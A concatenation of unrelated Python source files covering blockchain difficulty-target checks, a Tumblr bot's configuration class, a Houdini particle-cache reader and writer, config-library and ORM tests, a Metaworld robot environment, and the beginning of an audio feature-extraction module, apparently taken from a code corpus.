nModulatedTimespan = nMinTimespan
elif nModulatedTimespan > nMaxTimespan:
nModulatedTimespan = nMaxTimespan
bnOld = ArithUint256.SetCompact(bits)
bnNew = bnOld * nModulatedTimespan
# this doesn't work if it is nTargetTimespan even though that
# is what it looks like it should be based on reading the code
# in lbry.cpp
bnNew /= nModulatedTimespan
if bnNew > MAX_TARGET:
bnNew = ArithUint256(MAX_TARGET)
return bnNew.GetCompact(), bnNew._value
def verify_target(block):
#bits = int('0x' + block.get('bits'), 16)
bits = int(block.get('bits'),16)
#print bits
_, target = bits_to_target(bits)
int_hash = int('0x' + block.get('hash'), 16)
print ("int_hash: ", int_hash)
print ("target : ", target)
if (int_hash <= target):
print ("verify target success")
else:
print ("verify target failed")
def bits_to_target(rex):
value = ArithUint256.SetCompact(rex) #rex: 0x1111
return value.GetCompact(), value._value
def main():
# 2 block . data from blockchain-cli.
block_1 = {}
block_1['hash'] = '00022b278c567c27569618ba94fcfff38f0e5cffbce90a99cea80bc5cab89724'
block_1['bits'] = "1f07ffff"
block_1['timestamp'] = 1511426385
# 3 block
block_2 = {}
block_2['hash'] = '0006b528e8d76c90056d1685ca2dd9959726c7bfce9871ebd511a5aa44de0905'
block_2['bits'] = "1f07ffff"
block_2['timestamp'] = 1511426707
# 1000 block
block_3 = {}
block_3['hash'] = '000447de95629ec2efa86cf95c2042491278ff49b822f12b701cb4c848051376'
block_3['bits'] = "1f079a69"
block_3['timestamp'] = 1511774706
# 1001 block
block_4 = {}
block_4['hash'] = '0007ac5bea8f2088135eb987462d85a82ae953257f5ee771f3f0631043da1148'
block_4['bits'] = "1f07c913"
block_4['timestamp'] = 1511774724
bits, target = get_target(0, block_1, block_2)
#to test bits to target.
#bits_0, target_0 = bits_to_target(GENESIS_BITS)
#print ("bits_0 :", bits_0)
#print ("target_0:", target_0)
verify_target(block_3)
verify_target(block_4)
if __name__ == '__main__':
main()
|
143998
|
from typing import List, Set, Dict
import json
import pytumblr
from api_tumblr.pytumblr_wrapper import RateLimitClient
API_KEYS_TYPE = List[str]
class BotSpecificConstants:
"""Values specific to my development environment and/or the social context of my bot, e.g. specific posts IDs where I need apply some override, or specific users I need to treat specially, etc"""
def __init__(
self,
blogName: str,
dash_blogName: str,
REBLOG_START_TS: int,
DASH_START_TS: int,
private_clients_api_keys: List[API_KEYS_TYPE],
dashboard_clients_api_keys: List[API_KEYS_TYPE],
bridge_service_host: str,
bridge_service_port: int,
BRIDGE_SERVICE_REMOTE_HOST: str,
BUCKET_NAME: str,
ask_min_words: int,
NO_REBLOG_IDS: Set[int] = set(),
DEF_REBLOG_IDS: Set[int] = set(),
FORCE_TRAIL_HACK_IDS: Set[int] = set(),
USER_AVOID_LIST: Set[str] = set(),
TAG_AVOID_LIST: Set[str] = set(),
DASH_TAG_AVOID_LIST: Set[str] = set(),
REPLY_USER_AUTO_ACCEPT_LIST: Set[str] = set(),
bad_strings: Set[str] = set(),
bad_strings_shortwords: Set[str] = set(),
okay_superstrings: Set[str] = set(),
likely_obscured_strings: Set[str] = set(),
profane_strings: Set[str] = set(),
hardstop_strings_review: Set[str] = set(),
hardstop_strings_reject: Set[str] = set(),
LIMITED_USERS: Dict[str, float] = dict(),
LIMITED_SUBSTRINGS: Dict[str, float] = dict(),
SCREENED_USERS: Set[str] = set(),
NO_SCRAPE_USERS: Set[str] = set(),
):
# TODO: standardize case in names
self.blogName = blogName
self.dash_blogName = dash_blogName
# when reblog feature started
self.REBLOG_START_TS = REBLOG_START_TS
# when reblog-from-dash feature started
self.DASH_START_TS = DASH_START_TS
# don't reblog these post IDs -- generally used when I want to write about the bot and then reblog to the bot
# i don't want a separate bot reblog "responding" to me
self.NO_REBLOG_IDS = NO_REBLOG_IDS
self.DEF_REBLOG_IDS = DEF_REBLOG_IDS
# overrides for tumblr blockquote weirdness
self.FORCE_TRAIL_HACK_IDS = FORCE_TRAIL_HACK_IDS
# tumblr api keys (4 strings per key)
self.private_clients_api_keys = private_clients_api_keys
self.dashboard_clients_api_keys = dashboard_clients_api_keys
# host name of the bridge service used in clients we expect to be running on the same machine
# (i.e. should be localhost under normal circumstances)
self.bridge_service_host = bridge_service_host
# port of the bridge service
self.bridge_service_port = bridge_service_port
# name of Google Cloud Storage bucket used to store models and data
self.BUCKET_NAME = BUCKET_NAME
# host name of the bridge service used in ML code
# if the ML code is running remotely, this will differ from `bridge_service_host`
self.BRIDGE_SERVICE_REMOTE_HOST = BRIDGE_SERVICE_REMOTE_HOST
# don't interact or mention these users
self.USER_AVOID_LIST = USER_AVOID_LIST
# bot-written post tags are removed if they contain any of these (substring matches, case-insensitive)
self.TAG_AVOID_LIST = TAG_AVOID_LIST
# don't reblog from dash if tags contain these (substring matches)
self.DASH_TAG_AVOID_LIST = DASH_TAG_AVOID_LIST
# for frequent repliers who don't otherwise trigger "OK to respond to this reply" logic
self.REPLY_USER_AUTO_ACCEPT_LIST = REPLY_USER_AUTO_ACCEPT_LIST
# write draft instead of auto-publish when post/tags contain these substrings
self.bad_strings = bad_strings
# form elements of bad_strings from these surrounded by various whitespace/punctuation
self.bad_strings_shortwords = bad_strings_shortwords
# ignore items from `bad_strings` when they appear inside of these longer strings
# e.g. if we wanted to filter "sex" without filtering "anne sexton"
self.okay_superstrings = okay_superstrings
# like bad_strings, but we attempt to detect these even if the user is trying to obscure them
# with e.g. zero-width unicode or l33tsp34k
self.likely_obscured_strings = likely_obscured_strings
# like bad_strings, but only used in contexts where we're trying to keep the language rated PG
self.profane_strings = profane_strings
# force write draft instead of auto-publish on these strings, even if ML model accepts post
self.hardstop_strings_review = hardstop_strings_review
self.hardstop_strings_review.update(USER_AVOID_LIST)
self.hardstop_strings_review.update(likely_obscured_strings)
# force ignore post on these strings, even if ML model accepts post
self.hardstop_strings_reject = hardstop_strings_reject
# `LIMITED_USERS` allows limiting the rate at which we interact with certain users, e.g. bots who post extremely often or people who send huge numbers of asks
#
# `LIMITED_USERS` should be a dict with usernames as keys. the values are floats. a value of X means approximately "respond to this user at most once per X hours."
self.LIMITED_USERS = LIMITED_USERS
# like `LIMITED_USERS`, but triggers the limiting on the presence of a substring in the input, rather than the name of the user
self.LIMITED_SUBSTRINGS = LIMITED_SUBSTRINGS
# write draft instead of auto-publish when responding to these users
self.SCREENED_USERS = SCREENED_USERS
self.NO_SCRAPE_USERS = NO_SCRAPE_USERS
self.ask_min_words = ask_min_words
@staticmethod
def load(path: str = "config.json") -> "BotSpecificConstants":
with open(path, "r", encoding="utf-8") as f:
constants = json.load(f)
list_to_set_keys = {
"NO_REBLOG_IDS",
"FORCE_TRAIL_HACK_IDS",
"USER_AVOID_LIST",
"TAG_AVOID_LIST",
"DASH_TAG_AVOID_LIST",
"REPLY_USER_AUTO_ACCEPT_LIST",
"bad_strings",
"bad_strings_shortwords",
"okay_superstrings",
"likely_obscured_strings",
"profane_strings",
"hardstop_strings_review",
"hardstop_strings_reject",
"SCREENED_USERS",
"NO_SCRAPE_USERS",
}
for list_to_set_key in list_to_set_keys:
constants[list_to_set_key] = set(constants[list_to_set_key])
return BotSpecificConstants(**constants)
@property
def private_clients(self) -> List[RateLimitClient]:
return [
RateLimitClient.from_tumblr_rest_client(
pytumblr.TumblrRestClient(*keys), self.blogName
)
for keys in self.private_clients_api_keys
]
@property
def dashboard_clients(self) -> List[RateLimitClient]:
return [
RateLimitClient.from_tumblr_rest_client(
pytumblr.TumblrRestClient(*keys), self.dash_blogName
)
for keys in self.dashboard_clients_api_keys
]
@property
def bridge_service_url(self):
return self.bridge_service_host + ":" + str(self.bridge_service_port)
def LIMITED_USERS_PROBS(self, EFFECTIVE_SLEEP_TIME) -> dict:
LIMITED_USERS_MINUTES_LOWER_BOUNDS = {
name: hours * 60 for name, hours in self.LIMITED_USERS.items()
}
LIMITED_USERS_PROBS = {
name: EFFECTIVE_SLEEP_TIME / (60 * lb)
for name, lb in LIMITED_USERS_MINUTES_LOWER_BOUNDS.items()
}
return LIMITED_USERS_PROBS
|
144018
|
import os
import sys
import hou
import struct
class pcache(object):
fileName = ""
fileType = 'a'
fileVersion = 1.0
propertyNames = []
propertyTypes = []
propertyData = bytearray()
itemcount = 0
itemstride = 0
defaultBindings = {
'P': 'position',
'N': 'normal',
'v': 'velocity',
'Cd': 'color',
'Alpha': 'alpha',
'uv': 'texCoord',
'age': 'age',
'life': 'lifetime'
}
components = ['x', 'y', 'z', 'w']
def __init__(self, filename=None):
self.clear()
if filename is not None: # read file
self.loadFromFile(filename)
def clear(self):
self.fileName = ""
self.fileType = 'a'
self.fileVersion = 1.0
self.propertyNames = []
self.propertyTypes = []
self.propertyData = bytearray()
self.itemcount = 0
self.itemstride = 0
def setDataFromGeometry(self, geo, export_attribs, property_names=None):
# sets data into geometry
if not isinstance(geo, hou.Geometry):
raise hou.Error("Input is not not a valid Houdini Geometry")
self.clear()
bindings = {}
attribs = export_attribs.split(' ')
if property_names is None: # use default corresponding table
bindings = self.defaultBindings
else:
propnames = property_names.split(' ')
for i in xrange(len(attribs)):
bindings[attribs[i]] = propnames[i]
retained_attribs = []
for attrib in attribs:
geo_attr = geo.findPointAttrib(attrib)
if geo_attr is not None:
data_type = geo_attr.dataType()
if data_type == hou.attribData.Int:
str_type = 'int'
elif data_type == hou.attribData.Float:
str_type = 'float'
components = geo_attr.size()
retained_attribs.append(geo_attr)
if components == 1: # float
self.propertyNames.append(bindings[attrib])
self.propertyTypes.append(str_type)
self.itemstride += 4
elif components <= 4: # vector
for i in xrange(components):
self.propertyNames.append(bindings[attrib] + ".{}".format(self.components[i]))
self.propertyTypes.append(str_type)
self.itemstride += 4
else:
raise hou.NodeWarning("Point attribute not found : {}".format(attrib))
print("------- {} PROPERTIES --------".format(len(self.propertyNames)))
for i in xrange(len(self.propertyNames)):
print("Property : {} ({})".format(self.propertyNames[i], self.propertyTypes[i]))
points = geo.points()
numpt = len(points)
self.itemcount = numpt
for point in points:
for i in xrange(len(retained_attribs)):
attr = retained_attribs[i]
val = point.attribValue(attr)
if self.propertyTypes[i] == "float":
t = 'f'
elif self.propertyTypes[i] == "int":
t = 'i'
if attr.size() > 1:
for comp in val:
pack = struct.pack(t, comp)
for byte in pack:
self.propertyData.append(byte)
else:
pack = struct.pack(t, val)
for byte in pack:
self.propertyData.append(byte)
def __getComponentCountFromName(self, name):
retval = 1
for i in xrange(len(self.components)):
if name.endswith(".{}".format(self.components[i])):
return i+1
return retval
def __isVectorComponent(self, name):
for i in xrange(len(self.components)):
if name.endswith(".{}".format(self.components[i])):
return True
return False
def __componentIndexOf(self, name):
retval = -1
for i in xrange(len(self.components)):
if name.endswith(".{}".format(self.components[i])):
return i
return retval
def __getNameWithoutComponent(self, name):
retval = name
for i in xrange(len(self.components)):
if name.endswith(".{}".format(self.components[i])):
return name.replace(".{}".format(self.components[i]),"")
return retval
def __reverseBinding(self, propertyName):
for key in self.defaultBindings:
if propertyName == self.defaultBindings[key]:
return key
return None
def createGeo(self, geo, useRecommendedNames=True):
# sets data into geometry
if not isinstance(geo, hou.Geometry):
raise hou.Error("Input is not not a valid Houdini Geometry")
geo.clear()
# deduce attributes to create from properties
attribs_to_create = {}
attribs_types_to_create = {}
attribs_property = {}
for i in xrange(len(self.propertyNames)):
name = self.propertyNames[i]
type = self.propertyTypes[i]
comp = self.__getNameWithoutComponent(name)
if useRecommendedNames:
attrib_name = self.__reverseBinding(comp)
if attrib_name is not None:
attribs_property[attrib_name] = comp
comp = attrib_name
else:
attribs_property[comp] = comp
complen = self.__getComponentCountFromName(name)
attribs_types_to_create[comp] = type;
if comp in attribs_to_create:
attribs_to_create[comp] = max(attribs_to_create[comp], complen)
else:
attribs_to_create[comp] = complen
# Attrib Creation, item structure
for comp in attribs_to_create:
if geo.findPointAttrib(comp) is None:
print "{} point attribute not found: creating...".format(comp)
if attribs_types_to_create[comp] == "float":
default_val = 0.0
elif attribs_types_to_create[comp] == "int":
default_val = 0
else:
default_val = None
if attribs_to_create[comp] == 1:
geo.addAttrib(hou.attribType.Point, comp, default_val)
else:
default_vec = list()
for i in xrange(attribs_to_create[comp]):
default_vec.append(default_val)
geo.addAttrib(hou.attribType.Point, comp, default_vec)
# Data Storage
for i in xrange(self.itemcount):
pt = geo.createPoint()
# get bytes
item_data = self.propertyData[i * self.itemstride: (i * self.itemstride) + self.itemstride]
attrib_data = {}
# fill in data
index = 0
for j in xrange(len(self.propertyNames)):
# get actual value
if self.propertyTypes[j] == "float":
val = struct.unpack("f", item_data[index:index+4])
index += 4
# print "Unpack Float ({}) : {}".format(self.propertyNames[j], val[0])
elif self.propertyTypes[j] == "int":
val = struct.unpack("i", item_data[index:index+4])
index += 4
# print "Unpack Integer ({}) : {}".format(self.propertyNames[j], val[0])
else:
val = None
if self.__isVectorComponent(self.propertyNames[j]):
# for vector stuff
key = self.__reverseBinding(self.__getNameWithoutComponent(self.propertyNames[j]))
idx = self.__componentIndexOf(self.propertyNames[j])
if key not in attrib_data:
attrib_data[key] = [0.0, 0.0, 0.0]
attrib_data[key][idx] = val[0]
else:
# 1-component data
key = self.__reverseBinding(self.__getNameWithoutComponent(self.propertyNames[j]))
attrib_data[key] = val[0]
# print attrib_data
for attrib in attrib_data:
pt.setAttribValue(attrib, attrib_data[attrib])
def loadFromFile(self, filename):
file = open(filename, "rb")
with open(filename, "rb") as file:
magic = file.readline()
if magic != "pcache\n":
raise hou.Error("Invalid file header: expected pcache magic number : {}".format(magic))
self.clear()
done = False
while not done:
with hou.InterruptableOperation("Loading PCACHE Header", open_interrupt_dialog=False) as operation:
line = file.readline().replace("\n","")
words = line.split(" ")
kw = words[0]
if kw == "end_header":
done = True
elif kw == "format":
if words[1] == "ascii":
self.fileType = 'a'
elif words[1] == "binary":
self.fileType = 'b'
else:
raise hou.Error("Invalid format: {}".format(words[1]))
elif kw == "elements":
count = int(words[1])
self.itemcount = count
elif kw == "property":
if len(words) != 3:
raise hou.Error("Invalid property description: {}".format(words))
if words[1] == "float":
self.propertyTypes.append("float")
self.propertyNames.append(words[2])
self.itemstride += 4
elif words[1] == "int":
self.propertyTypes.append("int")
self.propertyNames.append(words[2])
self.itemstride += 4
elif kw == "comment":
print ' '.join(words).replace("comment ", "")
self.propertyData = bytearray(file.read())
print "Item Stride is {} bytes".format(self.itemstride)
length = len(self.propertyData)
self.itemcount = length/self.itemstride
print "Found {} bytes of data, corresponding to {} items".format(length, self.itemcount)
def saveAsFile(self, filename):
# save data
file = open(filename, "wb")
file.write("pcache\n") # header magic number
file.write("comment PCACHE file Exported from Houdini\n") # -------------------
file.write("format binary 1.0\n") # version and format
file.write("elements {}\n".format(self.itemcount)) # item count
for i in xrange(len(self.propertyNames)): # every property
file.write("property {} {}\n".format(self.propertyTypes[i], self.propertyNames[i]))
file.write("end_header\n") # end of header
# data
file.write(self.propertyData)
file.close()
|
144065
|
from fireo.fields import TextField, NumberField
from fireo.models import Model
class City(Model):
name = TextField()
population = NumberField()
def test_issue_126():
city = City.collection.create(name='NYC', population=500000, no_return=True)
assert city == None
|
144095
|
import shutil
import sys
from datetime import datetime
from pathlib import Path
from typing import Any, Dict, List, Tuple
import pytest
import hesiod.core as hcore
from hesiod import get_cfg_copy, get_out_dir, get_run_name, hcfg, hmain
from hesiod.core import _parse_args
def test_args_kwargs(base_cfg_dir: Path, simple_run_file: Path) -> None:
@hmain(base_cfg_dir, run_cfg_file=simple_run_file, create_out_dir=False, parse_cmd_line=False)
def test(a: int, b: str, c: float = 3.4) -> Tuple[int, str, float]:
return a, b, c
ra, rb, rc = test(2, "param_b", c=1.23456)
assert ra == 2
assert rb == "param_b"
assert rc == 1.23456
def test_load_config_simple(base_cfg_dir: Path, simple_run_file: Path) -> None:
@hmain(base_cfg_dir, run_cfg_file=simple_run_file, create_out_dir=False, parse_cmd_line=False)
def test() -> None:
assert hcfg("group_1.param_a") == 1
assert hcfg("group_1.param_b") == 1.2
assert hcfg("group_2.param_c") is True
assert hcfg("group_2.param_d") == "param_d"
assert hcfg("group_3.param_e.param_f") == "param_f"
assert hcfg("group_3.param_e.param_g") == 2
assert hcfg("group_3.param_e.param_h") == 4.56
test()
def test_load_config_complex(base_cfg_dir: Path, complex_run_file: Path) -> None:
@hmain(base_cfg_dir, run_cfg_file=complex_run_file, create_out_dir=False, parse_cmd_line=False)
def test() -> None:
assert hcfg("dataset.name") == "cifar10"
assert hcfg("dataset.path") == "/path/to/cifar10"
assert hcfg("dataset.splits") == [70, 20, 10]
assert hcfg("dataset.classes") == [1, 5, 6]
assert hcfg("net.name") == "efficientnet"
assert hcfg("net.num_layers") == 20
assert hcfg("net.ckpt_path") == "/path/to/efficientnet"
assert hcfg("run_name") == "test"
assert hcfg("lr") == 5e-3
assert hcfg("optimizer") == "adam"
test()
def test_load_config_wrong(base_cfg_dir: Path, wrong_run_file: Path) -> None:
@hmain(base_cfg_dir, run_cfg_file=wrong_run_file, create_out_dir=False, parse_cmd_line=False)
def test() -> None:
pass
with pytest.raises(ValueError):
test()
def test_hcfg(base_cfg_dir: Path, simple_run_file: Path) -> None:
@hmain(base_cfg_dir, run_cfg_file=simple_run_file, create_out_dir=False, parse_cmd_line=False)
def test() -> None:
g1pa = hcfg("group_1.param_a", int)
assert g1pa == 1 and isinstance(g1pa, int)
g1pb = hcfg("group_1.param_b", float)
assert g1pb == 1.2 and isinstance(g1pb, float)
g2pc = hcfg("group_2.param_c", bool)
assert g2pc is True and isinstance(g2pc, bool)
g2pd = hcfg("group_2.param_d", str)
assert g2pd == "param_d" and isinstance(g2pd, str)
g3 = hcfg("group_3", Dict[str, Any])
assert isinstance(g3, dict)
g4 = hcfg("group_4", Tuple[int, bool, str]) # type: ignore
assert g4 == (1, True, "test") and isinstance(g4, tuple)
g5 = hcfg("group_5", List[float])
assert g5 == [0.1, 0.1, 0.1] and isinstance(g5, list)
with pytest.raises(TypeError):
hcfg("group_1.param_a", str)
with pytest.raises(TypeError):
hcfg("group_1.param_b", int)
with pytest.raises(TypeError):
hcfg("group_2.param_c", str)
with pytest.raises(TypeError):
hcfg("group_2.param_d", bool)
with pytest.raises(TypeError):
hcfg("group_3", Dict[str, int])
with pytest.raises(TypeError):
hcfg("group_4", Tuple[int, float, int]) # type: ignore
with pytest.raises(TypeError):
hcfg("group_5", List[str])
test()
def test_cfg_copy(base_cfg_dir: Path, complex_run_file: Path) -> None:
@hmain(base_cfg_dir, run_cfg_file=complex_run_file, create_out_dir=False, parse_cmd_line=False)
def test() -> None:
cfg_copy = get_cfg_copy()
assert cfg_copy == hcore._CFG
assert id(cfg_copy) != id(hcore._CFG)
cfg_copy["dataset"]["name"] = "new_dataset"
assert hcore._CFG["dataset"]["name"] == "cifar10"
assert cfg_copy != hcore._CFG
test()
def test_out_dir(base_cfg_dir: Path, complex_run_file: Path) -> None:
@hmain(base_cfg_dir, run_cfg_file=complex_run_file, parse_cmd_line=False)
def test1() -> None:
out_dir = get_out_dir()
assert out_dir.absolute() == Path("logs/test").absolute()
@hmain(base_cfg_dir, run_cfg_file="logs/test/run.yaml", parse_cmd_line=False)
def test2() -> None:
out_dir = get_out_dir()
assert out_dir.absolute() == Path("logs/test").absolute()
test1()
test2()
shutil.rmtree("logs")
def test_no_run_name(base_cfg_dir: Path, no_run_name_run_file: Path) -> None:
@hmain(
base_cfg_dir,
run_cfg_file=no_run_name_run_file,
run_name_strategy=None,
parse_cmd_line=False,
)
def test() -> None:
pass
with pytest.raises(ValueError):
test()
def test_default_run_name(base_cfg_dir: Path, no_run_name_run_file: Path) -> None:
@hmain(
base_cfg_dir,
run_cfg_file=no_run_name_run_file,
run_name_strategy=hcore.RUN_NAME_STRATEGY_DATE,
create_out_dir=False,
parse_cmd_line=False,
)
def test() -> None:
now = datetime.now()
run_name = get_run_name()
assert run_name == now.strftime(hcore.RUN_NAME_DATE_FORMAT)
test()
def test_run_name(base_cfg_dir: Path, complex_run_file: Path) -> None:
@hmain(base_cfg_dir, run_cfg_file=complex_run_file, create_out_dir=False, parse_cmd_line=False)
def test() -> None:
run_name = get_run_name()
assert run_name == "test"
test()
def test_parse_args(base_cfg_dir: Path, simple_run_file: Path) -> None:
@hmain(
base_cfg_dir=base_cfg_dir,
run_cfg_file=simple_run_file,
create_out_dir=False,
parse_cmd_line=False,
)
def test() -> None:
args = [
"group_1.param_a=5",
"group_1.param_c=1.2345",
"group_1.param_d=1e-4",
"group_1.param_e=False",
"-group_3.param_e.param_i:this is a test",
"--group_5=[1, 2, 3]",
'---group_6.subgroup.subsubgroup.subsubsubgroup:(1.2, "test", True)',
'----param_7=\\|!"£$%&/()=?^€[]*@#°§<>,;.:-_+=abcABC123àèìòùç',
"param_8:{7, 8, 9}",
"param_9:=value",
"param_10=:value",
"param_11==value",
"param_12::value",
"#param_13:value",
"!param_14=value",
]
_parse_args(args)
assert hcfg("group_1.param_a") == 5
assert hcfg("group_1.param_b") == 1.2
assert hcfg("group_1.param_c") == 1.2345
assert hcfg("group_1.param_d") == 1e-4
assert hcfg("group_1.param_e") is False
assert hcfg("group_2.param_c") is True
assert hcfg("group_2.param_d") == "param_d"
assert hcfg("group_3.param_e.param_f") == "param_f"
assert hcfg("group_3.param_e.param_g") == 2
assert hcfg("group_3.param_e.param_h") == 4.56
assert hcfg("group_3.param_e.param_i") == "this is a test"
assert hcfg("group_4") == (1, True, "test")
assert hcfg("group_5") == [1, 2, 3]
assert hcfg("group_6.subgroup.subsubgroup.subsubsubgroup") == (1.2, "test", True)
assert hcfg("param_7") == '\\|!"£$%&/()=?^€[]*@#°§<>,;.:-_+=abcABC123àèìòùç'
assert hcfg("param_8") == {7, 8, 9}
assert hcfg("param_9") == "=value"
assert hcfg("param_10") == ":value"
assert hcfg("param_11") == "=value"
assert hcfg("param_12") == ":value"
assert hcfg("#param_13") == "value"
assert hcfg("!param_14") == "value"
wrong_args = [
"key value",
"keyvalue",
"key-value",
"key_value",
"=",
":",
"-=",
"-:",
]
for arg in wrong_args:
with pytest.raises(ValueError):
_parse_args([arg])
test()
def test_parse_cmd_line(base_cfg_dir: Path, complex_run_file: Path) -> None:
sys.argv = ["test"]
sys.argv.append("--dataset.classes=[4, 7, 8]")
sys.argv.append("--lr=1e-10")
sys.argv.append('--new_group.new_sub_group.new_sub_param={"t", "e", "s", "t"}')
def check_cfg() -> None:
assert hcfg("dataset.name") == "cifar10"
assert hcfg("dataset.path") == "/path/to/cifar10"
assert hcfg("dataset.splits") == [70, 20, 10]
assert hcfg("dataset.classes") == [4, 7, 8]
assert hcfg("net.name") == "efficientnet"
assert hcfg("net.num_layers") == 20
assert hcfg("net.ckpt_path") == "/path/to/efficientnet"
assert hcfg("run_name") == "test"
assert hcfg("lr") == 1e-10
assert hcfg("optimizer") == "adam"
assert hcfg("new_group.new_sub_group.new_sub_param") == {"t", "e", "s", "t"}
@hmain(base_cfg_dir, run_cfg_file=complex_run_file)
def test1() -> None:
check_cfg()
@hmain(base_cfg_dir, run_cfg_file="logs/test/run.yaml", parse_cmd_line=False)
def test2() -> None:
check_cfg()
test1()
test2()
shutil.rmtree("logs")
|
144113
|
import numpy as np
from gym.spaces import Box
from metaworld.envs import reward_utils
from metaworld.envs.asset_path_utils import full_v2_path_for
from metaworld.envs.mujoco.sawyer_xyz.sawyer_xyz_env import SawyerXYZEnv, _assert_task_is_set
class SawyerBinPickingEnvV2(SawyerXYZEnv):
"""
Motivation for V2:
V1 was often unsolvable because the cube could be located outside of
the starting bin. It could even be near the base of the Sawyer and out
of reach of the gripper. V2 changes the `obj_low` and `obj_high` bounds
to fix this.
Changelog from V1 to V2:
- (7/20/20) Changed object initialization space
- (7/24/20) Added Byron's XML changes
- (11/23/20) Updated reward function to new pick-place style
"""
def __init__(self):
hand_low = (-0.5, 0.40, 0.07)
hand_high = (0.5, 1, 0.5)
obj_low = (-0.21, 0.65, 0.02)
obj_high = (-0.03, 0.75, 0.02)
# Small bounds around the center of the target bin
goal_low = np.array([0.1199, 0.699, -0.001])
goal_high = np.array([0.1201, 0.701, +0.001])
super().__init__(
self.model_name,
hand_low=hand_low,
hand_high=hand_high,
)
self.init_config = {
'obj_init_angle': 0.3,
'obj_init_pos': np.array([-0.12, 0.7, 0.02]),
'hand_init_pos': np.array((0, 0.6, 0.2)),
}
self.goal = np.array([0.12, 0.7, 0.02])
self.obj_init_pos = self.init_config['obj_init_pos']
self.obj_init_angle = self.init_config['obj_init_angle']
self.hand_init_pos = self.init_config['hand_init_pos']
self._target_to_obj_init = None
self.hand_and_obj_space = Box(
np.hstack((self.hand_low, obj_low)),
np.hstack((self.hand_high, obj_high)),
)
self.goal_and_obj_space = Box(
np.hstack((goal_low[:2], obj_low[:2])),
np.hstack((goal_high[:2], obj_high[:2])),
)
self.goal_space = Box(goal_low, goal_high)
self._random_reset_space = Box(
np.hstack((obj_low, goal_low)),
np.hstack((obj_high, goal_high)),
)
@property
def model_name(self):
return full_v2_path_for('sawyer_xyz/sawyer_bin_picking.xml')
@_assert_task_is_set
def evaluate_state(self, obs, action):
(
reward,
near_object,
grasp_success,
obj_to_target,
grasp_reward,
in_place_reward
) = self.compute_reward(action, obs)
info = {
'success': float(obj_to_target <= 0.05),
'near_object': float(near_object),
'grasp_success': float(grasp_success),
'grasp_reward': grasp_reward,
'in_place_reward': in_place_reward,
'obj_to_target': obj_to_target,
'unscaled_reward': reward,
}
return reward, info
@property
def _target_site_config(self):
return []
def _get_id_main_object(self):
return self.unwrapped.model.geom_name2id('objGeom')
def _get_pos_objects(self):
return self.get_body_com('obj')
def _get_quat_objects(self):
return self.sim.data.get_body_xquat('obj')
def reset_model(self):
self._reset_hand()
self._target_pos = self.goal.copy()
self.obj_init_pos = self.init_config['obj_init_pos']
self.obj_init_angle = self.init_config['obj_init_angle']
obj_height = self.get_body_com('obj')[2]
if self.random_init:
self.obj_init_pos = self._get_state_rand_vec()[:2]
self.obj_init_pos = np.concatenate((self.obj_init_pos, [obj_height]))
self._set_obj_xyz(self.obj_init_pos)
self._target_pos = self.get_body_com('bin_goal')
self._target_to_obj_init = None
return self._get_obs()
def compute_reward(self, action, obs):
hand = obs[:3]
obj = obs[4:7]
target_to_obj = np.linalg.norm(obj - self._target_pos)
if self._target_to_obj_init is None:
self._target_to_obj_init = target_to_obj
in_place = reward_utils.tolerance(
target_to_obj,
bounds=(0, self.TARGET_RADIUS),
margin=self._target_to_obj_init,
sigmoid='long_tail',
)
threshold = 0.03
radii = [
np.linalg.norm(hand[:2] - self.obj_init_pos[:2]),
np.linalg.norm(hand[:2] - self._target_pos[:2])
]
# floor is a *pair* of 3D funnels centered on (1) the object's initial
# position and (2) the desired final position
floor = min([
0.02 * np.log(radius - threshold) + 0.2
if radius > threshold else 0.0
for radius in radii
])
# prevent the hand from running into the edge of the bins by keeping
# it above the "floor"
above_floor = 1.0 if hand[2] >= floor else reward_utils.tolerance(
max(floor - hand[2], 0.0),
bounds=(0.0, 0.01),
margin=0.05,
sigmoid='long_tail',
)
object_grasped = self._gripper_caging_reward(
action,
obj,
obj_radius=0.015,
pad_success_thresh=0.05,
object_reach_radius=0.01,
xz_thresh=0.01,
desired_gripper_effort=0.7,
high_density=True,
)
reward = reward_utils.hamacher_product(object_grasped, in_place)
near_object = np.linalg.norm(obj - hand) < 0.04
pinched_without_obj = obs[3] < 0.43
lifted = obj[2] - 0.02 > self.obj_init_pos[2]
# Increase reward when properly grabbed obj
grasp_success = near_object and lifted and not pinched_without_obj
if grasp_success:
reward += 1. + 5. * reward_utils.hamacher_product(
above_floor, in_place
)
# Maximize reward on success
if target_to_obj < self.TARGET_RADIUS:
reward = 10.
return (
reward,
near_object,
grasp_success,
target_to_obj,
object_grasped,
in_place
)
|
144243
|
import numpy as np
import librosa
import json
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import sys
sys.path.append('vggish/')
from math import pi
import pandas as pd
from tqdm import tqdm
from sklearn.preprocessing import OneHotEncoder
import pickle
import xgboost as xgb
from scipy.fftpack import fft, hilbert
import warnings
warnings.filterwarnings("ignore")
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
SR = 22050 # sample rate
FRAME_LEN = int(SR / 10) # 100 ms
HOP = int(FRAME_LEN / 2) # 50% overlap, meaning 5ms hop length
MFCC_dim = 13 # the MFCC dimension
SR_VGG = 16000 # VGG pretrained model sample rate
checkpoint_path = "vggish/vggish_model.ckpt"
def sta_fun(np_data):
"""Extract various statistical features from the numpy array provided as input.
:param np_data: the numpy array to extract the features from
:type np_data: numpy.ndarray
:return: The extracted features as a vector
:rtype: numpy.ndarray
"""
# perform a sanity check
if np_data is None:
raise ValueError("Input array cannot be None")
# perform the feature extraction
dat_min = np.min(np_data)
dat_max = np.max(np_data)
dat_mean = np.mean(np_data)
dat_rms = np.sqrt(np.sum(np.square(np_data)) / len(np_data))
dat_median = np.median(np_data)
dat_qrl1 = np.percentile(np_data, 25)
dat_qrl3 = np.percentile(np_data, 75)
dat_lower_q = np.quantile(np_data, 0.25, interpolation="lower")
dat_higher_q = np.quantile(np_data, 0.75, interpolation="higher")
dat_iqrl = dat_higher_q - dat_lower_q
dat_std = np.std(np_data)
s = pd.Series(np_data)
dat_skew = s.skew()
dat_kurt = s.kurt()
# finally return the features in a concatenated array (as a vector)
return np.array([dat_mean, dat_min, dat_max, dat_std, dat_rms,
dat_median, dat_qrl1, dat_qrl3, dat_iqrl, dat_skew, dat_kurt])
def sta_fun_2(npdata): # 1D np array
"""Extract various statistical features from the VGG output.
:param np_data: the numpy array to extract the features from
:type np_data: numpy.ndarray
:return: The extracted features as a vector
:rtype: numpy.ndarray
"""
# perform a sanity check
if npdata is None:
raise ValueError("Input array cannot be None")
# perform the feature extraction
Mean = np.mean(npdata, axis=0)
Std = np.std(npdata, axis=0)
